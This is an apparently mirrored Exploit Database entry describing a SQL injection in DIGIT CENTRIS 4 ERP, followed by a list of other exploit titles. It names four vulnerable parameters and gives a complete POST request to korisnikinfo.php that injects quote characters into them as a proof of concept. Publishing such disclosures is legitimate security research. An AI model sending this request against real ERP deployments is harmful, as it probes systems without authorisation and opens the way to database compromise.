DIGIT CENTRIS 4 ERP – ‘datum1’ SQL Injection

Exploit Database
19 阅读

作者： n1x_

日期： 2019-09-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/47401/

# Exploit Title: DIGIT CENTRIS 4 ERP - 'datum1' SQL Injection
# Date: 2019-09-19
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: http://www.digit-rs.com/
# Product Homepage: http://digit-rs.com/centris.html
# Version: Every version
# CVE : N/A

# Vulnerable parameters: datum1, datum2, KID, PID 

# [POST REQUEST]
 
POST /korisnikinfo.php HTTP/1.1
Content-Length: 65
Content-Type: application/x-www-form-urlencoded
Referer: http://host
Host: host
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
 
ListaPDF=Lista%20u%20PDF&datum1=1'"&datum2=01.01.2001'"&KID=1'"&PID=1'"

last Exploits
DIGIT CENTRIS 4 ERP – ‘datum1’ SQL Injection的更多信息

AShop – Open Redirection / Cross-Site Scripting：
WordPress Plugin KN Fix Your Title 1.0.1 – ‘Separator’ Stored Cross-Site Scripting (XSS)：
CakePHP 2.2.8/2.3.7 – AssetDispatcher Class Local File Inclusion：
EyesOfNetwork (EON) 5.0 – Remote Code Execution：
Flatpress Add Blog 1.0.3 – Persistent Cross-Site Scripting：
Python CGIHTTPServer – Encoded Directory Traversal：
Joomla! Component StreetGuessr Game 1.1.8 – SQL Injection：
S9Y Serendipity 1.5.4 – Arbitrary File Upload：